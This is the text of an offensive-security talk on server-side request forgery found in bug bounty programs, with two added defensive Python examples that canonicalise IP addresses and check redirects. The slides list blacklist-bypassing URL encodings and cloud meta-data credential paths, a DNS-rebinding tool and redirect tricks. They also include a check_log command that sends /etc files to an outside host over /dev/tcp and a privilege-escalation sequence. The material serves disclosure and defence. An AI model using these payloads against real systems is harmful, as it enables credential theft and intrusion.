Server-side browsing considered harmful
Nicolas Grégoire, Agarri (Offensive security), 05/21/2015

Agenda: Context, Vectors, Targets, Blacklists, Bugs, Toolbox

Section: Context

Methodology
- Identify server-side browsing
  - Identify protections (mostly blacklists)
  - Then bypass them
- Try to maximize impact during exploitation
  - Ideally with responses echoed back
  - Prefer RCE or Cloud pwnage to port scan
- Aka "creatively express my laziness"

Scope
- Covers only a few bug bounty programs
  - Facebook, Yahoo, CoinBase, PayPal, ...
- Criteria
  - Interesting targets
  - Good security team
  - Fast reaction
  - Nice payouts

Section: Vectors

Vectors
- Resources for developers
  - API explorer (Adobe Omniture - @riyazwalikar)
  - Debug of IPN aka Webhooks (payment world)
- Third-party data sources
  - Upload from URL (Dropbox, FastMail, ...)
  - Import of RSS feeds (YQL, Yandex, ...)
- Third-party authentication
  - OAuth, SAML, ... (used everywhere)

Vectors
- Core features of the target application
  - Google Translate can work from a URL
  - Prezi "Export to portable format"
- Mixed-content proxies
  - Hopscotch (FastMail), Camo (GitHub)
  - And also "imageproxy", "pilbox", ...
- Hosted code
  - Parse will execute your own JS code (YQL too!)

Section: Targets

URL handlers
- file:// is an easy win
  - May be reached via an HTTP redirect
  - Java trick: file:///proc/self/cwd/../config/
- Exotic handlers
  - gopher://, dict://, php://, jar://, tftp://, ...
  - Look at the "SSRF Bible" if interested

URL handlers
- http:// and https:// are always available
  - Let's focus on these ones!
URL handlers
- Lots of possible targets
  - HTTP and HTTPS applications
  - Compatible services like Redis
  - Fingerprintable services: SMTP, SSH, ...

Destinations
- Main goals
  - Loopback
  - Multicast
- Secondary goals
  - Internal network aka LAN
  - Public IP space

Loopback
- Often hosts sensitive services
  - IP-based ACL bypassed by design
- Monitoring
  - Custom: Yahoo "ymon"
  - Open Source: Consul, Monit, ...
- Data repositories
  - Solr, Redis, memcached, ...

Loopback
- Depending on the architecture
  - Loopback may not be the backend
  - But an outbound proxy
- Shared? With whom? In scope?
  - CoinBase & Proximo

The loopback idiosyncrasy
- Symptoms
  - Scanning using different features
  - Getting different results
- Probable causes
  - Partial proxying (YQL)
  - Specialized backends

Multicast
- Works for every EC2 or OpenStack VM
  - Meta-data server at http://169.254.169.254/
- Interesting targets
  - Always here: /latest/meta-data/{hostname,public-ipv4,...}
  - User data (startup script for auto-scaling): /latest/user-data
  - Temporary AWS credentials: /latest/meta-data/iam/security-credentials/

Internal network
- Most of the time, there's a LAN
  - Except for some Cloud-only setups
- With non-hardened services
  - Monitoring, stats, ...
  - Databases, keystores, ...
- But you need the addressing plan
  - Btw, are you sure 10/8 is in scope?

Public IP space
- Sometimes...
  - Public ACL != internal ACL
  - Private services on public IP
- Not so uncommon...
  - noc.parse.com => 54.85.239.3
  - Hosting a Go debugger

Section: Blacklists

Blacklists
- Only a few destinations to forbid
  - So implementing blacklists is easy
  - Or not?
Blacklists
- Let's focus on
  - http://169.254.169.254/
  - http://127.0.0.1/

Blacklists – DNS
- http://metadata.nicob.net/
  - Simple static A record
- http://169.254.169.254.xip.io/
  - Free wildcard DNS service
- http://1ynrnhl.xip.io/
  - Encoded as base36(int('254.169.254.169'))
- http://www.owasp.org.1ynrnhl.xip.io/
  - If both whitelists and blacklists are used

Blacklists – HTTP redirects
- Redirect to the meta-data server
  - Static way: HTTP 302 to http://169.154.169.254/ from http://nicob.net/redir6a
  - Dynamic way: http://nicob.net/redir-http-169.254.169.254:80-

Blacklists – HTTP redirects
- Redirects work IRL
  - There's more than 302
  - Like 307 for POST to POST
- Test with a (multi-step) loop
  - Yahoo and Stripe were affected
  - May produce some distinctive errors
- Points to a redirect URL via the UI/API
  - Then make dynamic changes on your side

Blacklists – Alternate IP encoding
- Most common representation
  - Dotted decimal
  - 127.0.0.1, 169.254.169.254, ...
Blacklists – Alternate IP encoding
- But any HTTP client supports more
  - Browser, proxy, library, ...
  - http://www.pc-help.org/obscure.htm

Blacklists – Alternate IP encoding
- http://425.510.425.510/             dotted decimal with overflow
- http://2852039166/                  dotless decimal
- http://7147006462/                  dotless decimal with overflow
- http://0xA9.0xFE.0xA9.0xFE/         dotted hexadecimal
- http://0xA9FEA9FE/                  dotless hexadecimal
- http://0x41414141A9FEA9FE/          dotless hexadecimal with overflow
- http://0251.0376.0251.0376/         dotted octal
- http://0251.00376.000251.0000376/   dotted octal with padding

Blacklists – Alternate IP encoding
- And you can mix them
  - http://425.254.0xa9.0376/
  - Decimal (w/ and w/o overflow) + hex + octal
- Or convert only parts of the address
  - http://0251.0xfe.43518/
  - Octal + hex + 2-byte wide dotless decimal

Blacklists – IPv6
- http://[::169.254.169.254]/
  - IPv4-compatible address
- http://[::ffff:169.254.169.254]/
  - IPv4-mapped address

Blacklists – loopback only
- http://127.127.127.127/
  - Yes, it's a /8
- http://0.0.0.0/
  - Works surprisingly often...
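As an added defender's example (my code, not from the talk): a canonicaliser that reads every host literal syntax listed above the way a permissive client does, so that a blacklist compares against the address that would actually be dialled rather than the raw string. It does not resolve DNS names (the xip.io tricks need a resolution step), and the BLOCKED ranges are my choice for the example.

```python
import ipaddress
import re
from typing import Optional, Union
from urllib.parse import urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Ranges a server-side fetcher should never dial (chosen for this example).
BLOCKED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "::1/128", "::/128",   # loopback, incl. the 0/8 trick
    "169.254.0.0/16",                                   # link-local / meta-data server
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",    # LAN
    "224.0.0.0/4",                                      # multicast
)]

def _label(tok: str) -> int:
    """One dotted label as inet_aton reads it: 0x hex, leading-0 octal, else decimal."""
    if not re.fullmatch(r"0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*", tok.lower()):
        raise ValueError(tok)
    return int(tok[2:], 16) if tok[:2].lower() == "0x" else int(tok, 8) if tok[0] == "0" else int(tok)

def canonical_ip(host: str) -> Optional[IPAddr]:
    """Address a permissive client would dial for a host literal (brackets already
    stripped); None means the host is a DNS name that must be resolved instead."""
    if ":" in host:                                         # IPv6 literal
        v6 = ipaddress.IPv6Address(host)
        if v6.ipv4_mapped is not None:                      # ::ffff:a.b.c.d
            return v6.ipv4_mapped
        if v6.packed[:12] == bytes(12) and int(v6) > 1:     # ::a.b.c.d (IPv4-compatible)
            return ipaddress.IPv4Address(v6.packed[12:])
        return v6                                           # ::1, :: and ordinary IPv6
    try:
        parts = [_label(p) for p in host.split(".")]
    except ValueError:
        return None
    if not 1 <= len(parts) <= 4:
        return None
    # Leading labels keep only their low byte (the "overflow" trick); the last label
    # fills every remaining byte, as in 0251.0xfe.43518 or a bare 2852039166.
    value = 0
    for p in parts[:-1]:
        value = (value << 8) | (p & 0xFF)
    tail = 8 * (5 - len(parts))
    return ipaddress.IPv4Address((value << tail) | (parts[-1] & ((1 << tail) - 1)))

def is_blocked(url: str) -> bool:
    """True when the URL's host is an IP literal inside a forbidden range."""
    ip = canonical_ip(urlsplit(url).hostname or "")
    return ip is not None and any(ip in net for net in BLOCKED)
```

Mirroring the permissive parse (truncating oversized labels instead of rejecting them) is deliberate: a checker that is stricter than the client it protects is exactly what these encodings exploit.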
Blacklists – loopback only
- http://[::1]/ and http://[::]/
  - Moar IPv6

Blacklists – DNS TOCTOU
- Step 1
  - The backend server resolves the destination hostname
  - The backend server verifies the IP against a blacklist
  - The request is allowed to go to the outbound proxy
- Step 2
  - The proxy resolves the destination hostname
  - The response now points to a private IP address
- Toolbox
  - Dedicated sub-domain
  - Patched copy of DNSChef

Section: Bugs

Unused feature – Stripe
- https://checkout.stripe.com/v3/checkout/desktop.js
  - Containing a (never called) Ajax function
  - Taking only one parameter named "image_url"

    $.ajax({
      url: "https://checkout-api.stripe.com/color",
      data: { image_url: uri },
      type: "GET",
      dataType: "json"
    })

Unused feature – Stripe
- Client-side blacklist
  - Not a security measure
  - Includes 127.0.0.0/24
- Server-side blacklist
  - Loopback, internal, multicast, ...
  - But HTTP redirects are honored

Unused feature – Stripe
- Reward: $500

Hidden vector – Prezi
- Base64-encoded zipped XML document

Hidden vector – Prezi
- Easier to manage with a custom Burp extension

Hidden vector – Prezi
- Each embedded object is referred to by its URL
Hidden vector – Prezi
- Looking for some server-side processing
  - Feature "Export to PDF" => no
  - Feature "Export to ZIP" => yes
- Exploits
  - file:///etc/passwd ($2k)
  - http://169.254.169.254/ ($2k)
  - http://0177.0.0.1/ (IPy bypass, $500)

IPN – PayPal
- IPN testing interface for developers
- Existing blacklist
  - Bypassed with octal encoding
- Exploit
  - https://012.0110.0150.0036/
  - IPN sent successfully to 10.72.104.30
- Reward: $100

IPN – John Doe I
- Webhooks testing interface for developers
- No restriction on the destination
- Exploit
  - http://127.0.0.1:8500/v1/agent/self
  - First fix bypassed using http://0.0.0.0:61315/
- Reward: $750

IPN – CoinBase
- Callbacks testing interface for developers
- No restriction on the destination
- Exploit
  - http://169.254.169.254/latest/user-data
  - In fact, I pwned Proximo (paid shared outbound proxy)
  - Credentials for EC2, Heroku, ...
- Reward: $5k (time to fix+reward < 24h, kudos!)

Mixed-content proxy – John Doe II
- Links to external images from SSL pages
- The perfect SSRF vector
  - Any method, any header, full response
- Exploit (root RCE)
  - https://xxx/http://0.0.0.0:8500/v1/agent/check/register
  - https://xxx/http://0.0.0.0:8500/v1/agent/checks
- Reward: $3k

The YMON saga – Part 1
- YQL (and Pipes) can access external systems
- Existing blacklist (IP address + port)
  - Applied before following HTTP redirects

The YMON saga – Part 1
- Closed as WONTFIX
  “Thank you for your submission to Yahoo!
  We are aware of this functionality on our site and it is working as designed. Please continue to send us vulnerability reports!”
- Reward: $0

The YMON saga – Part 2
- Port TCP/9466
  - 405 Method Not Allowed
  - WS using the ymon namespace
- Google for "ymon wsdl"
  - Found ONE question from 2005

The YMON saga – Part 2
- WSDL analysis
  - 450 lines, 11 methods
  - Including echo, exec, ping, version, ...
- The exec() method
  - Looks sooooo interesting
  - But limited to some Nagios plugins

The YMON saga – Part 2
- Abuse the check_log plugin to leak files
    check_log -F /etc/* -O /dev/tcp/1.2.3.4/3333 -q ''
- Abuse the check_log plugin to make a copy of bash
    check_log -F /bin/bash -O /home/y/libexec/nagios/check_nt -q ''
- Then execute bash with root privileges
    check_nt -c 'id;uname -a'

The YMON saga – Part 2
- Reward: $15k

The YMON saga – Part 3
- Hex encoding used to bypass both the IP and port checks
  - Access (again) the "ymon" WS on loopback
  - Execute code as "y" and not "root" anymore
- Need to find something new
  - Identify some (unpatched) "ymon" master servers
  - Pwn them like previously
- Fix for the IP check bypassed using octal encoding
  - Yes, that's the third bypass!
The YMON saga – Part 3
- Reward: $6,600

SSJS – Parse
- Language: JavaScript
- Two offers
  - "Cloud Code": authenticated calls only
  - "Parse Hosting": complex MVC applications
- Outbound requests are allowed
  - Through a farm of dedicated proxies

SSJS – Parse
- Private and multicast addresses are filtered
- No restriction on loopback
  - Access to Monit through a proxying app
- Internal services running on public IP space
  - Access to a Redis DB on "noc.parse.com"
  - Note: external ACLs are OK

SSJS – Parse
- Internal services found on public IP
  - Ganglia, Monit, Nagios
  - Redis, MySQL
  - Go debugger for /usr/bin/shovel
- But no RCE...
- Reward: $20k

Section: Toolbox

Toolbox
- Script generating obfuscated IP addresses
- Public dynamic endpoint for HTTP(S) redirects
  - SSL certs are nearly never verified
- Web "bins"
  - http://httpbin.org/ (tons of options)
  - http://requestb.in/ (useful for blind requests)
- List of default ports used by internal and loopback services

Toolbox
- Burp Suite "search" feature
  - Basic criteria: "=http" and "url="
  - Will miss REST and XML parameters
- Dedicated DNS sub-domain
  - NS record pointing to a controlled server
  - Used for detection (now in Burp Suite) and blacklist evasion
- Patched copy of DNSChef
  - Takes multiple IP addresses and a resolution scheme

Toolbox
    root# ./rebind.py --ip1=169.254.169.254 --ip2= --scheme=212 --interface=
    [*] DNS Rebinder started on interface:
    [23:51:46] xxx.yyy.162.36: cooking the response of type 'A' for xxx.dyn-dom.tld to [1]
    [23:51:46] xxx.yyy.165.239: cooking the response of type 'A' for xxx.dyn-dom.tld to 169.254.169.254 [2]
    [23:51:49] xxx.yyy.167.12:
    cooking the response of type 'A' for xxx.dyn-dom.tld to [3]
    [23:53:13] xxx.yyy.162.36: cooking the response of type 'A' for xxx.dyn-dom.tld to [1]

Toolbox
- Dynamic HTTP redirects
  - Easy to use with Burp Intruder
  - Using a basic RewriteRule
    Source:       ^redir-([^/-]*)-([^/-]*)-(.*)$
    Destination:  $1://$2/$3 [L]

The end...

Conclusion
- Attackers
  - Weird machines
  - Primitives, exploit chains, ...
- Defenders
  - If you only need Internet resources
  - Put your endpoint outside!
  - And good luck!
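As an added example (my code, not Yahoo, Stripe, Parse or Agarri code) of what a fetcher that cannot be moved outside can do about the redirect and DNS TOCTOU bypasses from the Blacklists section: resolve once, refuse forbidden answers, hand the transport the pinned IP so no second lookup happens, and run every redirect hop through the same check. The resolver and transport are constructed offline stand-ins (hosts under example.test, a FORBIDDEN set of my choosing), and the resolver is assumed to return plain dotted-decimal answers, so canonicalising permissive IP literals is its job, not this code's.

```python
import ipaddress
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

Resolver = Callable[[str], List[str]]                              # name -> dotted-decimal answers
Transport = Callable[[str, str, str], Tuple[int, Dict[str, str]]]  # (ip, host, path) -> (status, headers)

FORBIDDEN = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4",   # loopback, meta-data, multicast
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]              # LAN

def pick_safe_ip(host: str, resolve: Resolver) -> str:
    """Resolve once, refuse if any answer is forbidden, return the IP to dial.
    Resolving again later (in the backend or an outbound proxy) is the TOCTOU hole."""
    answers = resolve(host)
    if not answers:
        raise ValueError(f"{host}: no address")
    for a in answers:
        if any(ipaddress.ip_address(a) in net for net in FORBIDDEN):
            raise ValueError(f"{host} -> {a} is forbidden")
    return answers[0]

def safe_fetch(url: str, resolve: Resolver, send: Transport, max_hops: int = 5) -> Tuple[int, str]:
    """Follow redirects by hand so every hop, not just the first URL, is checked."""
    for _ in range(max_hops):
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            raise ValueError(f"unsupported URL {url!r}")
        ip = pick_safe_ip(parts.hostname, resolve)             # pinned for this hop only
        status, headers = send(ip, parts.hostname, parts.path or "/")
        if status not in (301, 302, 303, 307, 308):
            return status, url
        url = urljoin(url, headers.get("Location", ""))        # 307 keeps POST as POST; still checked
    raise ValueError("too many redirects")

# Constructed stand-ins: a name rebinding to the meta-data server on its second lookup, and a redirector.
_DNS = {"rebind.example.test": ["93.184.216.34", "169.254.169.254"],
        "redir.example.test": ["93.184.216.34"], "ok.example.test": ["93.184.216.34"]}
_HOPS = {("redir.example.test", "/redir6a"): (302, {"Location": "http://169.254.169.254/latest/user-data"})}
_DIALLED: List[str] = []                                       # IPs the transport was actually given

def demo_resolve(host: str) -> List[str]:
    answers = _DNS.get(host)
    if answers is None:                       # IP literal: a real resolver would canonicalise it here
        return [host]
    return [answers.pop(0)] if len(answers) > 1 else answers[:1]   # next answer on each call

def demo_send(ip: str, host: str, path: str) -> Tuple[int, Dict[str, str]]:
    _DIALLED.append(ip)
    return _HOPS.get((host, path), (200, {}))
```

With a real HTTP library the same idea means opening the socket to the pinned IP while sending the original Host header, and disabling the library's own redirect following.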